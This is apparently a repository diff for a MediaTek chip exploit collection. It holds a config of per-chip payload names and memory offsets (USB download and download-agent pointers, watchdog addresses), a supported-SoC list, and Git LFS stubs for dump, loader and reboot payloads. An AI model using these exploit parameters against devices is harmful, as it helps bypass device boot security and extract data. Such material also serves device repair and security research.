|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"0x6261": { // mt6261
|
3 |
+
"payload": "mt6261_payload.bin",
|
4 |
+
"var_1": 0x28,
|
5 |
+
"watchdog_address": 0xA0030000,
|
6 |
+
},
|
7 |
+
|
8 |
+
"0x6572": { // mt6572
|
9 |
+
"payload": "mt6572_payload.bin",
|
10 |
+
"payload_address": 0x10036A0,
|
11 |
+
"ptr_usbdl": 0x40ba68,
|
12 |
+
"ptr_da": 0x40befc,
|
13 |
+
},
|
14 |
+
|
15 |
+
"0x6580": { // mt6580
|
16 |
+
"payload": "mt6580_payload.bin",
|
17 |
+
"var_1": 0xAC,
|
18 |
+
"ptr_usbdl": 0xb60c,
|
19 |
+
"ptr_da": 0xba94,
|
20 |
+
},
|
21 |
+
|
22 |
+
"0x6582": { // mt6582
|
23 |
+
"payload": "mt6582_payload.bin",
|
24 |
+
"ptr_usbdl": 0xa5fc,
|
25 |
+
"ptr_da": 0xaa84,
|
26 |
+
},
|
27 |
+
|
28 |
+
"0x6592": { // mt6592
|
29 |
+
"payload": "mt6592_payload.bin",
|
30 |
+
"ptr_usbdl": 0xa564,
|
31 |
+
"ptr_da": 0xa9ec,
|
32 |
+
},
|
33 |
+
|
34 |
+
"0x6595": { // mt6595
|
35 |
+
"payload": "mt6595_payload.bin",
|
36 |
+
"ptr_usbdl": 0xb218,
|
37 |
+
"ptr_da": 0xb6a0,
|
38 |
+
},
|
39 |
+
|
40 |
+
"0x321": { // mt6735
|
41 |
+
"watchdog_address": 0x10212000,
|
42 |
+
"var_0": 0x10,
|
43 |
+
"var_1": 0x28,
|
44 |
+
"payload": "mt6735_payload.bin",
|
45 |
+
"ptr_usbdl": 0x95f8,
|
46 |
+
"ptr_da": 0x9a94,
|
47 |
+
},
|
48 |
+
|
49 |
+
"0x335": { // mt6737
|
50 |
+
"watchdog_address": 0x10212000,
|
51 |
+
"var_0": 0x10,
|
52 |
+
"var_1": 0x28,
|
53 |
+
"payload": "mt6737_payload.bin",
|
54 |
+
"ptr_usbdl": 0x9608,
|
55 |
+
"ptr_da": 0x9aa4,
|
56 |
+
},
|
57 |
+
|
58 |
+
"0x699": { // mt6739
|
59 |
+
"var_0": 0x20,
|
60 |
+
"var_1": 0xB4,
|
61 |
+
"payload": "mt6739_payload.bin",
|
62 |
+
"ptr_usbdl": 0xdf1c,
|
63 |
+
"ptr_da": 0xe3e8,
|
64 |
+
},
|
65 |
+
|
66 |
+
"0x337": { // mt6753
|
67 |
+
"watchdog_address": 0x10212000,
|
68 |
+
"var_1": 0x28,
|
69 |
+
"payload": "mt6753_payload.bin",
|
70 |
+
"ptr_usbdl": 0x9668,
|
71 |
+
"ptr_da": 0x9b04,
|
72 |
+
},
|
73 |
+
|
74 |
+
"0x326": { // mt6755
|
75 |
+
"payload": "mt6755_payload.bin",
|
76 |
+
"ptr_usbdl": 0x9a6c,
|
77 |
+
"ptr_da": 0x9f14,
|
78 |
+
},
|
79 |
+
|
80 |
+
"0x551": { // mt6757
|
81 |
+
"payload": "mt6757_payload.bin",
|
82 |
+
"ptr_usbdl": 0x9c2c,
|
83 |
+
"ptr_da": 0xa0e8,
|
84 |
+
},
|
85 |
+
|
86 |
+
"0x717": { // mt6761
|
87 |
+
"var_1": 0x25,
|
88 |
+
"payload": "mt6761_payload.bin",
|
89 |
+
"ptr_usbdl": 0xbc8c,
|
90 |
+
"ptr_da": 0xc158,
|
91 |
+
},
|
92 |
+
|
93 |
+
"0x690": { // mt6763
|
94 |
+
"var_1": 0x7F,
|
95 |
+
"payload": "mt6763_payload.bin",
|
96 |
+
"ptr_usbdl": 0xd66c,
|
97 |
+
"ptr_da": 0xdb38,
|
98 |
+
},
|
99 |
+
|
100 |
+
"0x766": { // mt6765
|
101 |
+
"var_0": 0x2C,
|
102 |
+
"var_1": 0x25,
|
103 |
+
"payload": "mt6765_payload.bin",
|
104 |
+
"ptr_usbdl": 0xbdc0,
|
105 |
+
"ptr_da": 0xc28c
|
106 |
+
},
|
107 |
+
|
108 |
+
"0x707": { // mt6768
|
109 |
+
"var_0": 0x2C,
|
110 |
+
"var_1": 0x25,
|
111 |
+
"payload": "mt6768_payload.bin",
|
112 |
+
"ptr_usbdl": 0xc190,
|
113 |
+
"ptr_da": 0xc650,
|
114 |
+
},
|
115 |
+
|
116 |
+
"0x788": { // mt6771
|
117 |
+
"var_0": 0x20,
|
118 |
+
"payload": "mt6771_payload.bin",
|
119 |
+
"ptr_usbdl": 0xdebc,
|
120 |
+
"ptr_da": 0xe388,
|
121 |
+
},
|
122 |
+
|
123 |
+
"0x725": { // mt6779
|
124 |
+
"payload": "mt6779_payload.bin",
|
125 |
+
"ptr_usbdl": 0xe04c,
|
126 |
+
"ptr_da": 0xe50c,
|
127 |
+
},
|
128 |
+
|
129 |
+
"0x813": { // mt6785
|
130 |
+
"payload": "mt6785_payload.bin",
|
131 |
+
"ptr_usbdl": 0xe2a4,
|
132 |
+
"ptr_da": 0xe764,
|
133 |
+
},
|
134 |
+
|
135 |
+
"0x6795": { // mt6795
|
136 |
+
"payload": "mt6795_payload.bin",
|
137 |
+
"ptr_usbdl": 0x978c,
|
138 |
+
"ptr_da": 0x9c28,
|
139 |
+
},
|
140 |
+
|
141 |
+
"0x279": { // mt6797
|
142 |
+
"payload": "mt6797_payload.bin",
|
143 |
+
"ptr_usbdl": 0x9eac,
|
144 |
+
"ptr_da": 0xa354,
|
145 |
+
},
|
146 |
+
|
147 |
+
"0x816": { // mt6885
|
148 |
+
"payload": "mt6885_payload.bin",
|
149 |
+
"ptr_usbdl": 0xe6b8,
|
150 |
+
"ptr_da": 0xebbc,
|
151 |
+
},
|
152 |
+
|
153 |
+
"0x8127": { // mt8127
|
154 |
+
"payload": "mt8127_payload.bin",
|
155 |
+
"ptr_usbdl": 0xb2b8,
|
156 |
+
"ptr_da": 0xb740,
|
157 |
+
},
|
158 |
+
|
159 |
+
"0x8163": { // mt8163
|
160 |
+
"var_1": 0xB1,
|
161 |
+
"payload": "mt8163_payload.bin",
|
162 |
+
"ptr_usbdl": 0xc12c,
|
163 |
+
"ptr_da": 0xc5c8,
|
164 |
+
},
|
165 |
+
|
166 |
+
"0x8167": { // mt8516
|
167 |
+
"var_1": 0xCC,
|
168 |
+
"payload": "mt8167_payload.bin",
|
169 |
+
"ptr_usbdl": 0xd2e4,
|
170 |
+
"ptr_da": 0xd7ac,
|
171 |
+
},
|
172 |
+
|
173 |
+
"0x8172": { // mt8173
|
174 |
+
"payload": "mt8173_payload.bin",
|
175 |
+
"payload_address": 0x120A00,
|
176 |
+
"ptr_usbdl": 0xa0e4,
|
177 |
+
"ptr_da": 0xa580,
|
178 |
+
},
|
179 |
+
|
180 |
+
"0x8695": { // mt8695
|
181 |
+
"payload": "mt8695_payload.bin",
|
182 |
+
"ptr_usbdl": 0xbeec,
|
183 |
+
"ptr_da": 0xc3f8,
|
184 |
+
},
|
185 |
+
|
186 |
+
"0x886": { // mt6873
|
187 |
+
"payload": "mt6873_payload.bin",
|
188 |
+
"ptr_usbdl": 0xea78,
|
189 |
+
"ptr_da": 0xef38,
|
190 |
+
},
|
191 |
+
|
192 |
+
"0x562": { // mt6799
|
193 |
+
"watchdog_address": 0x10211000,
|
194 |
+
"payload": "mt6799_payload.bin",
|
195 |
+
"ptr_usbdl": 0xf5ac,
|
196 |
+
"ptr_da": 0xfa78,
|
197 |
+
},
|
198 |
+
|
199 |
+
"0x989": { // mt6833
|
200 |
+
"payload": "mt6833_payload.bin",
|
201 |
+
"ptr_usbdl": 0xdfe0,
|
202 |
+
"ptr_da": 0xe4a0,
|
203 |
+
},
|
204 |
+
|
205 |
+
"0x996": { // mt6853
|
206 |
+
"payload": "mt6853_payload.bin",
|
207 |
+
"ptr_usbdl": 0xea64,
|
208 |
+
"ptr_da": 0xef24,
|
209 |
+
},
|
210 |
+
|
211 |
+
"0x8590": { // mt8590
|
212 |
+
"payload": "mt8590_payload.bin",
|
213 |
+
"ptr_usbdl": 0xbbe4,
|
214 |
+
"ptr_da": 0xc06c,
|
215 |
+
},
|
216 |
+
}
|
exploits_collection/README.md
ADDED
@@ -0,0 +1,34 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
### Supported SoCs
|
2 |
+
- mt6261
|
3 |
+
- mt6572
|
4 |
+
- mt6580
|
5 |
+
- mt6582
|
6 |
+
- mt6592
|
7 |
+
- mt6595
|
8 |
+
- mt6735
|
9 |
+
- mt6737
|
10 |
+
- mt6739
|
11 |
+
- mt6750
|
12 |
+
- mt6753
|
13 |
+
- mt6755
|
14 |
+
- mt6757
|
15 |
+
- mt6761
|
16 |
+
- mt6763
|
17 |
+
- mt6765
|
18 |
+
- mt6768
|
19 |
+
- mt6771
|
20 |
+
- mt6779
|
21 |
+
- mt6785
|
22 |
+
- mt6795
|
23 |
+
- mt6797
|
24 |
+
- mt6799
|
25 |
+
- mt6833
|
26 |
+
- mt6853
|
27 |
+
- mt6873
|
28 |
+
- mt6885
|
29 |
+
- mt8127
|
30 |
+
- mt8163
|
31 |
+
- mt8167
|
32 |
+
- mt8173
|
33 |
+
- mt8590
|
34 |
+
- mt8695
|
exploits_collection/default_config.json5
ADDED
@@ -0,0 +1,216 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"0x6261": { // mt6261
|
3 |
+
"payload": "mt6261_payload.bin",
|
4 |
+
"var_1": 0x28,
|
5 |
+
"watchdog_address": 0xA0030000,
|
6 |
+
},
|
7 |
+
|
8 |
+
"0x6572": { // mt6572
|
9 |
+
"payload": "mt6572_payload.bin",
|
10 |
+
"payload_address": 0x10036A0,
|
11 |
+
"ptr_usbdl": 0x40ba68,
|
12 |
+
"ptr_da": 0x40befc,
|
13 |
+
},
|
14 |
+
|
15 |
+
"0x6580": { // mt6580
|
16 |
+
"payload": "mt6580_payload.bin",
|
17 |
+
"var_1": 0xAC,
|
18 |
+
"ptr_usbdl": 0xb60c,
|
19 |
+
"ptr_da": 0xba94,
|
20 |
+
},
|
21 |
+
|
22 |
+
"0x6582": { // mt6582
|
23 |
+
"payload": "mt6582_payload.bin",
|
24 |
+
"ptr_usbdl": 0xa5fc,
|
25 |
+
"ptr_da": 0xaa84,
|
26 |
+
},
|
27 |
+
|
28 |
+
"0x6592": { // mt6592
|
29 |
+
"payload": "mt6592_payload.bin",
|
30 |
+
"ptr_usbdl": 0xa564,
|
31 |
+
"ptr_da": 0xa9ec,
|
32 |
+
},
|
33 |
+
|
34 |
+
"0x6595": { // mt6595
|
35 |
+
"payload": "mt6595_payload.bin",
|
36 |
+
"ptr_usbdl": 0xb218,
|
37 |
+
"ptr_da": 0xb6a0,
|
38 |
+
},
|
39 |
+
|
40 |
+
"0x321": { // mt6735
|
41 |
+
"watchdog_address": 0x10212000,
|
42 |
+
"var_0": 0x10,
|
43 |
+
"var_1": 0x28,
|
44 |
+
"payload": "mt6735_payload.bin",
|
45 |
+
"ptr_usbdl": 0x95f8,
|
46 |
+
"ptr_da": 0x9a94,
|
47 |
+
},
|
48 |
+
|
49 |
+
"0x335": { // mt6737
|
50 |
+
"watchdog_address": 0x10212000,
|
51 |
+
"var_0": 0x10,
|
52 |
+
"var_1": 0x28,
|
53 |
+
"payload": "mt6737_payload.bin",
|
54 |
+
"ptr_usbdl": 0x9608,
|
55 |
+
"ptr_da": 0x9aa4,
|
56 |
+
},
|
57 |
+
|
58 |
+
"0x699": { // mt6739
|
59 |
+
"var_0": 0x20,
|
60 |
+
"var_1": 0xB4,
|
61 |
+
"payload": "mt6739_payload.bin",
|
62 |
+
"ptr_usbdl": 0xdf1c,
|
63 |
+
"ptr_da": 0xe3e8,
|
64 |
+
},
|
65 |
+
|
66 |
+
"0x337": { // mt6753
|
67 |
+
"watchdog_address": 0x10212000,
|
68 |
+
"var_1": 0x28,
|
69 |
+
"payload": "mt6753_payload.bin",
|
70 |
+
"ptr_usbdl": 0x9668,
|
71 |
+
"ptr_da": 0x9b04,
|
72 |
+
},
|
73 |
+
|
74 |
+
"0x326": { // mt6755
|
75 |
+
"payload": "mt6755_payload.bin",
|
76 |
+
"ptr_usbdl": 0x9a6c,
|
77 |
+
"ptr_da": 0x9f14,
|
78 |
+
},
|
79 |
+
|
80 |
+
"0x551": { // mt6757
|
81 |
+
"payload": "mt6757_payload.bin",
|
82 |
+
"ptr_usbdl": 0x9c2c,
|
83 |
+
"ptr_da": 0xa0e8,
|
84 |
+
},
|
85 |
+
|
86 |
+
"0x717": { // mt6761
|
87 |
+
"var_1": 0x25,
|
88 |
+
"payload": "mt6761_payload.bin",
|
89 |
+
"ptr_usbdl": 0xbc8c,
|
90 |
+
"ptr_da": 0xc158,
|
91 |
+
},
|
92 |
+
|
93 |
+
"0x690": { // mt6763
|
94 |
+
"var_1": 0x7F,
|
95 |
+
"payload": "mt6763_payload.bin",
|
96 |
+
"ptr_usbdl": 0xd66c,
|
97 |
+
"ptr_da": 0xdb38,
|
98 |
+
},
|
99 |
+
|
100 |
+
"0x766": { // mt6765
|
101 |
+
"var_0": 0x2C,
|
102 |
+
"var_1": 0x25,
|
103 |
+
"payload": "mt6765_payload.bin",
|
104 |
+
"ptr_usbdl": 0xbdc0,
|
105 |
+
"ptr_da": 0xc28c
|
106 |
+
},
|
107 |
+
|
108 |
+
"0x707": { // mt6768
|
109 |
+
"var_0": 0x2C,
|
110 |
+
"var_1": 0x25,
|
111 |
+
"payload": "mt6768_payload.bin",
|
112 |
+
"ptr_usbdl": 0xc190,
|
113 |
+
"ptr_da": 0xc650,
|
114 |
+
},
|
115 |
+
|
116 |
+
"0x788": { // mt6771
|
117 |
+
"var_0": 0x20,
|
118 |
+
"payload": "mt6771_payload.bin",
|
119 |
+
"ptr_usbdl": 0xdebc,
|
120 |
+
"ptr_da": 0xe388,
|
121 |
+
},
|
122 |
+
|
123 |
+
"0x725": { // mt6779
|
124 |
+
"payload": "mt6779_payload.bin",
|
125 |
+
"ptr_usbdl": 0xe04c,
|
126 |
+
"ptr_da": 0xe50c,
|
127 |
+
},
|
128 |
+
|
129 |
+
"0x813": { // mt6785
|
130 |
+
"payload": "mt6785_payload.bin",
|
131 |
+
"ptr_usbdl": 0xe2a4,
|
132 |
+
"ptr_da": 0xe764,
|
133 |
+
},
|
134 |
+
|
135 |
+
"0x6795": { // mt6795
|
136 |
+
"payload": "mt6795_payload.bin",
|
137 |
+
"ptr_usbdl": 0x978c,
|
138 |
+
"ptr_da": 0x9c28,
|
139 |
+
},
|
140 |
+
|
141 |
+
"0x279": { // mt6797
|
142 |
+
"payload": "mt6797_payload.bin",
|
143 |
+
"ptr_usbdl": 0x9eac,
|
144 |
+
"ptr_da": 0xa354,
|
145 |
+
},
|
146 |
+
|
147 |
+
"0x816": { // mt6885
|
148 |
+
"payload": "mt6885_payload.bin",
|
149 |
+
"ptr_usbdl": 0xe6b8,
|
150 |
+
"ptr_da": 0xebbc,
|
151 |
+
},
|
152 |
+
|
153 |
+
"0x8127": { // mt8127
|
154 |
+
"payload": "mt8127_payload.bin",
|
155 |
+
"ptr_usbdl": 0xb2b8,
|
156 |
+
"ptr_da": 0xb740,
|
157 |
+
},
|
158 |
+
|
159 |
+
"0x8163": { // mt8163
|
160 |
+
"var_1": 0xB1,
|
161 |
+
"payload": "mt8163_payload.bin",
|
162 |
+
"ptr_usbdl": 0xc12c,
|
163 |
+
"ptr_da": 0xc5c8,
|
164 |
+
},
|
165 |
+
|
166 |
+
"0x8167": { // mt8516
|
167 |
+
"var_1": 0xCC,
|
168 |
+
"payload": "mt8167_payload.bin",
|
169 |
+
"ptr_usbdl": 0xd2e4,
|
170 |
+
"ptr_da": 0xd7ac,
|
171 |
+
},
|
172 |
+
|
173 |
+
"0x8172": { // mt8173
|
174 |
+
"payload": "mt8173_payload.bin",
|
175 |
+
"payload_address": 0x120A00,
|
176 |
+
"ptr_usbdl": 0xa0e4,
|
177 |
+
"ptr_da": 0xa580,
|
178 |
+
},
|
179 |
+
|
180 |
+
"0x8695": { // mt8695
|
181 |
+
"payload": "mt8695_payload.bin",
|
182 |
+
"ptr_usbdl": 0xbeec,
|
183 |
+
"ptr_da": 0xc3f8,
|
184 |
+
},
|
185 |
+
|
186 |
+
"0x886": { // mt6873
|
187 |
+
"payload": "mt6873_payload.bin",
|
188 |
+
"ptr_usbdl": 0xea78,
|
189 |
+
"ptr_da": 0xef38,
|
190 |
+
},
|
191 |
+
|
192 |
+
"0x562": { // mt6799
|
193 |
+
"watchdog_address": 0x10211000,
|
194 |
+
"payload": "mt6799_payload.bin",
|
195 |
+
"ptr_usbdl": 0xf5ac,
|
196 |
+
"ptr_da": 0xfa78,
|
197 |
+
},
|
198 |
+
|
199 |
+
"0x989": { // mt6833
|
200 |
+
"payload": "mt6833_payload.bin",
|
201 |
+
"ptr_usbdl": 0xdfe0,
|
202 |
+
"ptr_da": 0xe4a0,
|
203 |
+
},
|
204 |
+
|
205 |
+
"0x996": { // mt6853
|
206 |
+
"payload": "mt6853_payload.bin",
|
207 |
+
"ptr_usbdl": 0xea64,
|
208 |
+
"ptr_da": 0xef24,
|
209 |
+
},
|
210 |
+
|
211 |
+
"0x8590": { // mt8590
|
212 |
+
"payload": "mt8590_payload.bin",
|
213 |
+
"ptr_usbdl": 0xbbe4,
|
214 |
+
"ptr_da": 0xc06c,
|
215 |
+
},
|
216 |
+
}
|
exploits_collection/payloads/generic_dump_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:5fdceec17aad68669b214dd65caa45a2b889b897936b77803e2f466a348af349
|
3 |
+
size 296
|
exploits_collection/payloads/generic_loader_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:e887a930a9477ab9a1e56b05b31bb5a58bed30664045338d97f7fe6dc71d3f54
|
3 |
+
size 64
|
exploits_collection/payloads/generic_reboot_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:f9c276cb23bc626753286de8b1ff96df5e4b25be3f59bbcf3a8032ac439fe108
|
3 |
+
size 48
|
exploits_collection/payloads/generic_uart_dump_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:bcc29db220226c4b900ddbf94023c6f3c3342ce705c26e3493502251238e4b32
|
3 |
+
size 312
|
exploits_collection/payloads/mt6261_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:6c55ce771f424d46fbb9af5ebab73dc35ce272365ca9eb443370b27bc3e31ff7
|
3 |
+
size 596
|
exploits_collection/payloads/mt6572_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:512dd5d09e4a34836b24e6caaa130d5209136a1759b1ef1be3dec9721bf04ccc
|
3 |
+
size 600
|
exploits_collection/payloads/mt6580_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:8ded7dfcad11bf60ee0e57b38d56e0ff7ccc8a6780c45fd9d8239ec8df53ba79
|
3 |
+
size 600
|
exploits_collection/payloads/mt6582_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:d65304bbcd3ee0b1c60dfaa706a183d5b3b29e8db62418d660855752289594d2
|
3 |
+
size 600
|
exploits_collection/payloads/mt6592_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:1d44e6cc8eb8d17c95a5b19ab5c951728ed39a6ea5b3e50b1df720df8649a9b4
|
3 |
+
size 600
|
exploits_collection/payloads/mt6595_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:d7a7363ed2b75a6796c94c6ade0c39a2838c00b7d5cf1e14a6ddcf607eb73634
|
3 |
+
size 600
|
exploits_collection/payloads/mt6735_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:5a845468619f58aa108236cd2e048374a374a0bf833b05969ffbdf2ca0bb662b
|
3 |
+
size 600
|
exploits_collection/payloads/mt6737_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:5b6efe0b5af21699007cd9eb47b88bdd800fd19d6ff70d65dceedd61ee7137e5
|
3 |
+
size 600
|
exploits_collection/payloads/mt6739_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:d372011cd5c72d94c635a1197c30b24716a8a4611f478888d4264004308ef9d2
|
3 |
+
size 612
|
exploits_collection/payloads/mt6750_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:4f952d41829f28b9ad88c0389c719a10c0942eb02ef32d3fe72f3c7fb7bd5f4e
|
3 |
+
size 684
|
exploits_collection/payloads/mt6753_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:ca48914ab40ce2fde63841b7651855c98477a5a93a79e6afc18c4b81d572b206
|
3 |
+
size 600
|
exploits_collection/payloads/mt6755_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:fa86a785a0bcf8468285c8922f931a94a2b23dcc93098b3281e5d52f28387262
|
3 |
+
size 600
|
exploits_collection/payloads/mt6757_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:c27f4b5d4b33c7bfd42d84927371041deb45f195797ebf371d7f713c93f90f57
|
3 |
+
size 600
|
exploits_collection/payloads/mt6761_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:f0d4f402ecdd17244d96db79e81bbbb4569a093ef0d97709d3cad7d7a5e85ab0
|
3 |
+
size 612
|
exploits_collection/payloads/mt6763_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:c193fa0c493f90471b23c3a89b339b4523df9cb15e6d9b1e24a749121522cffb
|
3 |
+
size 612
|
exploits_collection/payloads/mt6765_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:da9d34f8d56cc943683620eb79fc48b73872c6cb7e85454c50585fa68b496f46
|
3 |
+
size 612
|
exploits_collection/payloads/mt6768_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:8d812ae251c0b6294b8fc180169bd070e5d42b8e54a371cf14e635e4c3cc8302
|
3 |
+
size 612
|
exploits_collection/payloads/mt6771_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:7488880d5df691aa5fab26128a5632b8921350c31baeb43421735d8e03756bc7
|
3 |
+
size 612
|
exploits_collection/payloads/mt6779_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:02d95a77511902028a07df411ff51b869fad477b608d612368378f77607fff76
|
3 |
+
size 612
|
exploits_collection/payloads/mt6785_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:f0d47794bb84406ffd0c74a104f8d3237c5393859316b5712d8ce7c20fae4f3c
|
3 |
+
size 612
|
exploits_collection/payloads/mt6795_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:956b3b4c2643b38c39f1f1241cadd308def77c28c13940ecfe427e40130f59f2
|
3 |
+
size 600
|
exploits_collection/payloads/mt6797_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:e15b2acc3d2fae7b9dab5676cccbb610f1533eeffbf45ddba37777f7a8c6fe8b
|
3 |
+
size 600
|
exploits_collection/payloads/mt6799_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:a4604277287a3032f12651a1294c65c30367adece683220462ee4a2ad8148207
|
3 |
+
size 612
|
exploits_collection/payloads/mt6833_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:878f45230dc7433b45df93b141c34d2cf36f5fe6ac2f9c4e31be0c54d169b5de
|
3 |
+
size 612
|
exploits_collection/payloads/mt6853_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:0b98563fe19acc5f33af489603bce6678831a7d8674d73ecf2931abffea24a5d
|
3 |
+
size 612
|
exploits_collection/payloads/mt6873_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:657f7789d5997f439ef1ec7595675d48c08b8d08e0581b3776e166a85f8fa819
|
3 |
+
size 612
|
exploits_collection/payloads/mt6885_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:2a363f1175ec09660ba94b6b5bdbe506e044c4696eae43c3dfe2b1bef13c7440
|
3 |
+
size 612
|
exploits_collection/payloads/mt8127_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:372a67d80b5cca43858deed4f44e82f4c7a69faa0a28f8c1fa90fc8fe88de59f
|
3 |
+
size 600
|
exploits_collection/payloads/mt8163_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
